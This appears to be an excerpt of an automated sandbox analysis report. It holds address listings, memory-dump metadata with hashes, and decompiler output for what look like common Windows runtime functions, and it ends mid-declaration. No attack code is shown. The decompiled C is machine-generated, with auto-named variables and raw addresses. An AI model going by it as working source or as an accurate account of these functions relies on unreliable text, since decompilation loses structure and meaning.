                                                    0x04b5d6f5
                                                    0x04b5d6f9
                                                    0x04b5d6fb
                                                    0x04b5d6fd
                                                    0x04b5d701
                                                    0x04b5d703
                                                    0x04b5d70a
                                                    0x04b5d70a
                                                    0x04b5d701
                                                    0x04b5d710
                                                    0x04b5d710
                                                    0x04b5d6c1
                                                    0x04b5d6c1
                                                    0x04b5d6c6
                                                    0x04bab36d
                                                    0x04bab36f
                                                    0x00000000
                                                    0x04bab375
                                                    0x04bab375
                                                    0x04bab375
                                                    0x00000000
                                                    0x04bab375
                                                    0x00000000
                                                    0x04b5d6cc
                                                    0x04b5d6d8
                                                    0x04b5d6d8
                                                    0x04b5d6d8
                                                    0x00000000
                                                    0x04b5d6c6
                                                    0x04b5d6bf
                                                    0x00000000
                                                    0x04b5d6da
                                                    0x04b5d6da
                                                    0x04b5d716
                                                    0x04b5d71b
                                                    0x04b5d720
                                                    0x04b5d726
                                                    0x04b5d726
                                                    0x04b5d72d
                                                    0x00000000
                                                    0x04b5d733
                                                    0x04b5d739
                                                    0x04b5d742
                                                    0x04b5d750
                                                    0x04b5d758
                                                    0x04b5d764
                                                    0x04b5d776
                                                    0x04b5d77a
                                                    0x04b5d783
                                                    0x04b5d928
                                                    0x04b5d92c
                                                    0x04b5d93d
                                                    0x04b5d944
                                                    0x04b5d94f
                                                    0x04b5d954
                                                    0x04b5d956
                                                    0x04b5d95f
                                                    0x04b5d961
                                                    0x04b5d973
                                                    0x04b5d973
                                                    0x04b5d956
                                                    0x04b5d944
                                                    0x04b5d92c
                                                    0x04b5d78b
                                                    0x04bab394
                                                    0x04b5d791
                                                    0x04b5d798
                                                    0x04bab3a3
                                                    0x04bab3bb
                                                    0x04bab3bb
                                                    0x04b5d7a5
                                                    0x04b5d866
                                                    0x04b5d870
                                                    0x04b5d884
                                                    0x04b5d892
                                                    0x04b5d898
                                                    0x04b5d89e
                                                    0x04b5d8a0
                                                    0x04b5d8a6
                                                    0x04b5d8ac
                                                    0x04b5d8ae
                                                    0x04b5d8b4
                                                    0x04b5d8b4
                                                    0x04b5d8ae
                                                    0x04b5d7a5
                                                    0x04b5d78b
                                                    0x04b5d7b1
                                                    0x04bab3c5
                                                    0x04bab3c5
                                                    0x04b5d7c3
                                                    0x04b5d7ca
                                                    0x04b5d7e5
                                                    0x04b5d7eb
                                                    0x04b5d8eb
                                                    0x04b5d8ed
                                                    0x00000000
                                                    0x04b5d8f3
                                                    0x04b5d8f3
                                                    0x04b5d8f3
                                                    0x00000000
                                                    0x04b5d8ed
                                                    0x04b5d7cc
                                                    0x04b5d7cc
                                                    0x04b5d7d2
                                                    0x00000000
                                                    0x04b5d7d4
                                                    0x04b5d7d4
                                                    0x04b5d7d7
                                                    0x04b5d7df
                                                    0x04bab3d4
                                                    0x04bab3d9
                                                    0x04bab3dc
                                                    0x04bab3dc
                                                    0x04bab3df
                                                    0x04bab3e2
                                                    0x04bab468
                                                    0x04bab46d
                                                    0x04bab46f
                                                    0x04bab46f
                                                    0x04bab475
                                                    0x04b5d8f8
                                                    0x04b5d8f9
                                                    0x04b5d8fd
                                                    0x04bab3e8
                                                    0x04bab3e8
                                                    0x04bab3eb
                                                    0x04bab3ed
                                                    0x00000000
                                                    0x04bab3ef
                                                    0x04bab3ef
                                                    0x04bab3f1
                                                    0x04bab3f4
                                                    0x04bab3fe
                                                    0x04bab404
                                                    0x04bab409
                                                    0x04bab40e
                                                    0x04bab410
                                                    0x04bab410
                                                    0x04bab414
                                                    0x04bab414
                                                    0x04bab41b
                                                    0x04bab420
                                                    0x04bab423
                                                    0x04bab425
                                                    0x04bab427
                                                    0x04bab42a
                                                    0x04bab42d
                                                    0x04bab42d
                                                    0x04bab42a
                                                    0x04bab432
                                                    0x04bab436
                                                    0x04bab438
                                                    0x04bab43b
                                                    0x04bab43b
                                                    0x04bab449
                                                    0x04bab44e
                                                    0x04bab454
                                                    0x04bab458
                                                    0x04bab458
                                                    0x04bab45d
                                                    0x00000000
                                                    0x04bab45d
                                                    0x04bab3ed
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04b5d7df
                                                    0x04b5d7d2
                                                    0x04b5d7ca
                                                    0x04bab37c
                                                    0x04bab37e
                                                    0x04bab385
                                                    0x04bab38a
                                                    0x00000000
                                                    0x04bab38a
                                                    0x04b5d742
                                                    0x04b5d7f1
                                                    0x04b5d7f8
                                                    0x04bab49b
                                                    0x04bab49b
                                                    0x04b5d800
                                                    0x04b5d837
                                                    0x04b5d843
                                                    0x04b5d845
                                                    0x04b5d847
                                                    0x04b5d84a
                                                    0x04b5d84b
                                                    0x04b5d84e
                                                    0x04b5d857
                                                    0x04b5d802
                                                    0x04b5d802
                                                    0x04b5d80d
                                                    0x00000000
                                                    0x04b5d818
                                                    0x04b5d818
                                                    0x04b5d824
                                                    0x04b5d831
                                                    0x04bab4a5
                                                    0x04bab4ab
                                                    0x04bab4b3
                                                    0x04bab4b8
                                                    0x04bab4bb
                                                    0x00000000
                                                    0x04bab4c1
                                                    0x04bab4c1
                                                    0x04bab4c8
                                                    0x00000000
                                                    0x04bab4ce
                                                    0x04bab4d4
                                                    0x04bab4e1
                                                    0x04bab4e3
                                                    0x04bab4e5
                                                    0x00000000
                                                    0x04bab4eb
                                                    0x04bab4f0
                                                    0x04bab4f2
                                                    0x04b5dac9
                                                    0x04b5dacc
                                                    0x04b5dacf
                                                    0x04b5dad1
                                                    0x04b5dd78
                                                    0x04b5dd78
                                                    0x04b5dcf2
                                                    0x00000000
                                                    0x04b5dad7
                                                    0x04b5dad9
                                                    0x04b5dadb
                                                    0x00000000
                                                    0x00000000
                                                    0x04b5dae1
                                                    0x04b5dae1
                                                    0x04b5dae4
                                                    0x04b5dae6
                                                    0x04bab4f9
                                                    0x04bab4f9
                                                    0x04bab500
                                                    0x04b5daec
                                                    0x04b5daec
                                                    0x04b5daf5
                                                    0x04b5daf8
                                                    0x04b5dafb
                                                    0x04b5db03
                                                    0x04b5db11
                                                    0x04b5db16
                                                    0x04b5db19
                                                    0x04b5db1b
                                                    0x04bab52c
                                                    0x04bab531
                                                    0x04bab534
                                                    0x04b5db21
                                                    0x04b5db21
                                                    0x04b5db24
                                                    0x04b5dcd9
                                                    0x04b5dce2
                                                    0x04b5dce5
                                                    0x04b5dd6a
                                                    0x04b5dd6d
                                                    0x00000000
                                                    0x04b5dd73
                                                    0x04bab51a
                                                    0x04bab51c
                                                    0x04bab51f
                                                    0x04bab524
                                                    0x00000000
                                                    0x04bab524
                                                    0x04b5dce7
                                                    0x04b5dce7
                                                    0x04b5dce7
                                                    0x00000000
                                                    0x04b5dce7
                                                    0x00000000
                                                    0x04b5db2a
                                                    0x04b5db2c
                                                    0x04b5db31
                                                    0x04b5db33
                                                    0x04b5db36
                                                    0x04b5db39
                                                    0x04b5db3b
                                                    0x04b5db66
                                                    0x04b5db66
                                                    0x04b5db3d
                                                    0x04b5db3d
                                                    0x04b5db3e
                                                    0x04b5db46
                                                    0x04b5db47
                                                    0x04b5db49
                                                    0x04b5db4c
                                                    0x04b5db53
                                                    0x04b5db55
                                                    0x04b5db58
                                                    0x04b5db5a
                                                    0x04bab50a
                                                    0x04bab50f
                                                    0x04bab512
                                                    0x04b5db60
                                                    0x04b5db60
                                                    0x04b5db63
                                                    0x04b5db63
                                                    0x00000000
                                                    0x04b5db63
                                                    0x04b5db5a
                                                    0x04b5db3b
                                                    0x04b5db24
                                                    0x04b5db69
                                                    0x04b5db69
                                                    0x04b5db6c
                                                    0x04b5db6f
                                                    0x04b5db74
                                                    0x04bab557
                                                    0x04bab557
                                                    0x04bab55e
                                                    0x04b5db7a
                                                    0x04b5db7c
                                                    0x04b5db7f
                                                    0x04b5db82
                                                    0x04b5db85
                                                    0x00000000
                                                    0x04b5db8b
                                                    0x04b5db8b
                                                    0x04b5db8d
                                                    0x04b5db9b
                                                    0x04b5db9b
                                                    0x04b5db9d
                                                    0x04b5dba0
                                                    0x04b5dba2
                                                    0x04b5dba4
                                                    0x04b5dba7
                                                    0x04b5dba9
                                                    0x04b5dbae
                                                    0x04b5dbae
                                                    0x04b5dbb1
                                                    0x04b5dbb4
                                                    0x04b5dbb4
                                                    0x04b5dbb7
                                                    0x04b5dbba
                                                    0x04b5dcd2
                                                    0x04b5dcd4
                                                    0x00000000
                                                    0x04b5dbc0
                                                    0x04b5dbc0
                                                    0x04b5dbd2
                                                    0x04b5dbd7
                                                    0x04b5dbda
                                                    0x04b5dbdd
                                                    0x04b5dbdf
                                                    0x00000000
                                                    0x04b5dbe5
                                                    0x04b5dbe5
                                                    0x04b5dbee
                                                    0x04b5dbf1
                                                    0x04bab541
                                                    0x04bab544
                                                    0x00000000
                                                    0x04bab546
                                                    0x04bab546
                                                    0x00000000
                                                    0x04bab546
                                                    0x04b5dbf7
                                                    0x04b5dbf7
                                                    0x04b5dbfd
                                                    0x04b5dbfd
                                                    0x04b5dbff
                                                    0x04b5dc0b
                                                    0x04b5dc15
                                                    0x04b5dc1b
                                                    0x04b5dc1d
                                                    0x04b5dc21
                                                    0x04b5dc21
                                                    0x04b5dc23
                                                    0x04b5dc23
                                                    0x04b5dc26
                                                    0x04b5dc29
                                                    0x04b5dc2b
                                                    0x00000000
                                                    0x00000000
                                                    0x04b5dc31
                                                    0x04b5dc34
                                                    0x04b5dc36
                                                    0x04b5dcbf
                                                    0x04b5dcbf
                                                    0x04b5dcc2
                                                    0x00000000
                                                    0x04b5dc3c
                                                    0x04b5dc41
                                                    0x04b5dc43
                                                    0x00000000
                                                    0x04b5dc45
                                                    0x04b5dc45
                                                    0x04b5dc47
                                                    0x00000000
                                                    0x04b5dc4d
                                                    0x04b5dc4d
                                                    0x04b5dc50
                                                    0x04b5dc52
                                                    0x04b5dc55
                                                    0x04b5dcfa
                                                    0x04b5dcfe
                                                    0x04b5dd08
                                                    0x04b5dd0a
                                                    0x04b5dd0c
                                                    0x00000000
                                                    0x04b5dd12
                                                    0x04b5dd15
                                                    0x04b5dd2d
                                                    0x04b5dd2f
                                                    0x04b5dd32
                                                    0x04b5dd35
                                                    0x00000000
                                                    0x04b5dd35
                                                    0x04b5dc5b
                                                    0x04b5dc5b
                                                    0x04b5dc5e
                                                    0x04b5dc61
                                                    0x04b5dc64
                                                    0x04b5dc67
                                                    0x04b5dc67
                                                    0x04b5dc6a
                                                    0x04b5dc6c
                                                    0x04b5dc8e
                                                    0x04b5dc8e
                                                    0x04b5dc91
                                                    0x04b5dc93
                                                    0x04b5dcce
                                                    0x04b5dcce
                                                    0x04b5dc95
                                                    0x04b5dc9c
                                                    0x04b5dc6e
                                                    0x04b5dc72
                                                    0x04b5dc75
                                                    0x04b5dc77
                                                    0x04b5dc79
                                                    0x04bab551
                                                    0x04bab551
                                                    0x00000000
                                                    0x04b5dc7f
                                                    0x04b5dc7f
                                                    0x04b5dc81
                                                    0x00000000
                                                    0x04b5dc83
                                                    0x04b5dc86
                                                    0x04b5dc88
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04b5dc88
                                                    0x04b5dc81
                                                    0x04b5dc79
                                                    0x04b5dc6c
                                                    0x04b5dc55
                                                    0x04b5dc47
                                                    0x04b5dc43
                                                    0x00000000
                                                    0x04b5dc36
                                                    0x04b5dc23
                                                    0x00000000
                                                    0x04b5dbff
                                                    0x04b5dbf1
                                                    0x04b5dbdf
                                                    0x04b5db8f
                                                    0x04b5db92
                                                    0x04b5db95
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04b5db95
                                                    0x04b5db8d
                                                    0x04b5db85
                                                    0x04b5db74
                                                    0x04b5dc9f
                                                    0x04b5dca2
                                                    0x04b5dcb0
                                                    0x04b5dcb0
                                                    0x04b5dad1
                                                    0x04bab4e5
                                                    0x04bab4c8
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04b5d831
                                                    0x04b5d80d
                                                    0x00000000
                                                    0x04b5d800
                                                    0x04bab47f
                                                    0x04bab485
                                                    0x00000000
                                                    0x04bab485
                                                    0x04b5d665
                                                    0x04b5d652
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d4fe7748c619cffb14749792595e8e271d6cbd7230525e865a9abff2b7cdaf65
                                                    • Instruction ID: f5da8ea34d898eab3348e2cb9d7be93d12aa8cac16ebface5c269d95652186c7
                                                    • Opcode Fuzzy Hash: d4fe7748c619cffb14749792595e8e271d6cbd7230525e865a9abff2b7cdaf65
                                                    • Instruction Fuzzy Hash: 95E1BE34A052598FEB24DF28C890B69F7B6FF45308F0482E9DA19972A0DB34BD95CF51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B5849B, Relevance: .3, Instructions: 290COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 92%
                                                    			E04B5849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x4c1f9c0);
				E04B9D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x4c37b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E04B5CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E04B62280( *[fs:0x30], 0x4c38550);
						_t139 =  *0x4c37b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E04B7F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E04B5FFB0(_t193, _t235, 0x4c38550);
								L5:
								return E04B9D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E04B41C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x4c37b9c; // 0x0
							_t235 = L04B64620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x4c37b10; // 0x10
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E04B7A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E04B5FFB0(_t193, _t235, 0x4c38550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L04B677F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L04B677F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x4c37b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x4c37b10; // 0x10
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E04B837C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x4c37b9c; // 0x0
									_t214 = L04B64620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E04B837F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x4c37b10 =  *0x4c37b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x4c37b04 =  *0x4c37b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L04B677F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L04B677F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x4c37b08 =  *0x4c37b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E04B857C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E04B8F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L04B677F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E04B7A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L04B677F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E04B896C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                                    0x04b5849b
                                                    0x04b5849b
                                                    0x04b5849b
                                                    0x04b5849b
                                                    0x04b5849d
                                                    0x04b584a2
                                                    0x04b584a7
                                                    0x04b584b1
                                                    0x04b584d8
                                                    0x00000000
                                                    0x04b584b3
                                                    0x04b584c4
                                                    0x04b584c9
                                                    0x04b584cd
                                                    0x04b584cf
                                                    0x04b584cf
                                                    0x04b584d6
                                                    0x04b584e6
                                                    0x04b584e9
                                                    0x04b584ec
                                                    0x04b584ef
                                                    0x04b584f2
                                                    0x04b584f4
                                                    0x04b584fc
                                                    0x04b58501
                                                    0x04b58506
                                                    0x04b58509
                                                    0x04b586e0
                                                    0x04b586e5
                                                    0x04b586e8
                                                    0x04b586ed
                                                    0x04b586f0
                                                    0x04b586f2
                                                    0x04ba9afd
                                                    0x04ba9b02
                                                    0x04b584da
                                                    0x04b584df
                                                    0x04b584df
                                                    0x04b586fa
                                                    0x04b586fd
                                                    0x04b586fe
                                                    0x04b58701
                                                    0x04b58706
                                                    0x04b58709
                                                    0x04b5870b
                                                    0x00000000
                                                    0x00000000
                                                    0x04b58711
                                                    0x04b58725
                                                    0x04b58727
                                                    0x04b5872a
                                                    0x04b5872c
                                                    0x04ba9af0
                                                    0x04ba9af5
                                                    0x04b58732
                                                    0x04b58732
                                                    0x04b58732
                                                    0x04b58735
                                                    0x04b58737
                                                    0x04b58515
                                                    0x04b58515
                                                    0x04b58518
                                                    0x04b5851d
                                                    0x04b58523
                                                    0x04b58527
                                                    0x04b5852b
                                                    0x04b58537
                                                    0x04b58539
                                                    0x04b5853c
                                                    0x04b5853e
                                                    0x04b5868c
                                                    0x04b58691
                                                    0x04b58699
                                                    0x04b5869b
                                                    0x04b58744
                                                    0x04b58748
                                                    0x04b586a1
                                                    0x04b586a1
                                                    0x04b586a1
                                                    0x04b586a4
                                                    0x04b586a8
                                                    0x04ba9bdf
                                                    0x04ba9bdf
                                                    0x04b586ae
                                                    0x04b586b0
                                                    0x00000000
                                                    0x04b586b6
                                                    0x00000000
                                                    0x04ba9be9
                                                    0x04b586b0
                                                    0x04b58544
                                                    0x04b5854a
                                                    0x04b5854d
                                                    0x04b58551
                                                    0x04b5876e
                                                    0x04b58778
                                                    0x04b5877b
                                                    0x04b58780
                                                    0x04b58557
                                                    0x04b58557
                                                    0x04b5855d
                                                    0x04b5855d
                                                    0x04b5856b
                                                    0x04b5856e
                                                    0x04b58570
                                                    0x04b58573
                                                    0x04b58576
                                                    0x04b58576
                                                    0x04b58579
                                                    0x04b5857b
                                                    0x00000000
                                                    0x00000000
                                                    0x04b58581
                                                    0x04b585a0
                                                    0x04b585a2
                                                    0x04b585a5
                                                    0x04b585a7
                                                    0x04ba9b1b
                                                    0x04ba9b1b
                                                    0x04b5862e
                                                    0x04b5862e
                                                    0x04b58631
                                                    0x04b58631
                                                    0x04b58634
                                                    0x04b58636
                                                    0x04b58669
                                                    0x04b58669
                                                    0x04b5866b
                                                    0x04ba9bbf
                                                    0x04ba9bc4
                                                    0x04ba9bc8
                                                    0x04ba9bce
                                                    0x04ba9bce
                                                    0x04b58671
                                                    0x04b58671
                                                    0x04b58674
                                                    0x04b58676
                                                    0x04ba9bae
                                                    0x04ba9bae
                                                    0x04b58676
                                                    0x04b5867c
                                                    0x04b5867e
                                                    0x04b58688
                                                    0x04b58688
                                                    0x00000000
                                                    0x04b5867e
                                                    0x04b58638
                                                    0x04b58638
                                                    0x04b5863b
                                                    0x04b5863e
                                                    0x04b5863f
                                                    0x04b58642
                                                    0x04b58645
                                                    0x04b58648
                                                    0x04b5864d
                                                    0x04ba9b69
                                                    0x04ba9b6e
                                                    0x04ba9b7b
                                                    0x04ba9b81
                                                    0x04ba9b85
                                                    0x04ba9b89
                                                    0x04ba9ba7
                                                    0x04ba9b8b
                                                    0x04ba9b91
                                                    0x04ba9b9a
                                                    0x04ba9b9f
                                                    0x04ba9b9f
                                                    0x04b58788
                                                    0x04b5878d
                                                    0x04b58763
                                                    0x04b58763
                                                    0x04b58766
                                                    0x00000000
                                                    0x04b58766
                                                    0x04ba9b70
                                                    0x00000000
                                                    0x04ba9b70
                                                    0x04b58656
                                                    0x04b5865a
                                                    0x04b5865c
                                                    0x04b58752
                                                    0x04b58756
                                                    0x00000000
                                                    0x00000000
                                                    0x04b5875e
                                                    0x00000000
                                                    0x04b5875e
                                                    0x04b58662
                                                    0x04b58662
                                                    0x04b58662
                                                    0x04b58666
                                                    0x00000000
                                                    0x04b58666
                                                    0x04b585b7
                                                    0x04b585b9
                                                    0x04b585bc
                                                    0x04b585bf
                                                    0x04b585cc
                                                    0x04b585d1
                                                    0x04b585d4
                                                    0x04b585db
                                                    0x04b585de
                                                    0x04b585e0
                                                    0x04ba9b5f
                                                    0x00000000
                                                    0x04ba9b5f
                                                    0x04b585e6
                                                    0x04b585ea
                                                    0x04b586c3
                                                    0x04b586c5
                                                    0x04b586c8
                                                    0x04b586ca
                                                    0x04ba9b16
                                                    0x00000000
                                                    0x04ba9b16
                                                    0x04b586d6
                                                    0x04b585f6
                                                    0x04b585f6
                                                    0x04b585f9
                                                    0x04b58602
                                                    0x04b58606
                                                    0x04b5860a
                                                    0x04b5860b
                                                    0x04b5860e
                                                    0x04b58611
                                                    0x00000000
                                                    0x04b58611
                                                    0x04b585f3
                                                    0x00000000
                                                    0x04b585f3
                                                    0x04b58619
                                                    0x04b5861e
                                                    0x04b5861e
                                                    0x04b58621
                                                    0x04b58622
                                                    0x04b58623
                                                    0x04b58625
                                                    0x04b5862c
                                                    0x00000000
                                                    0x04b5873d
                                                    0x00000000
                                                    0x04b5873d
                                                    0x04b58737
                                                    0x04b5850f
                                                    0x04b58512
                                                    0x00000000
                                                    0x04b58512
                                                    0x00000000
                                                    0x04b584d6

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 35f8a0ad1cd6f23789293969a5d6b0c1c25a60ace321c6baffec2f9698fe4cf6
                                                    • Instruction ID: e6b8f03051e1359ce4f192d9223fce7b71e3e6419890eed5659ca4c4b00963c9
                                                    • Opcode Fuzzy Hash: 35f8a0ad1cd6f23789293969a5d6b0c1c25a60ace321c6baffec2f9698fe4cf6
                                                    • Instruction Fuzzy Hash: F4B15AB4E00209DFDB14EF99C984BADFBB5FF48308F1045AAE815AB251E774B855CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B7513A, Relevance: .3, Instructions: 258COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 67%
                                                    			E04B7513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
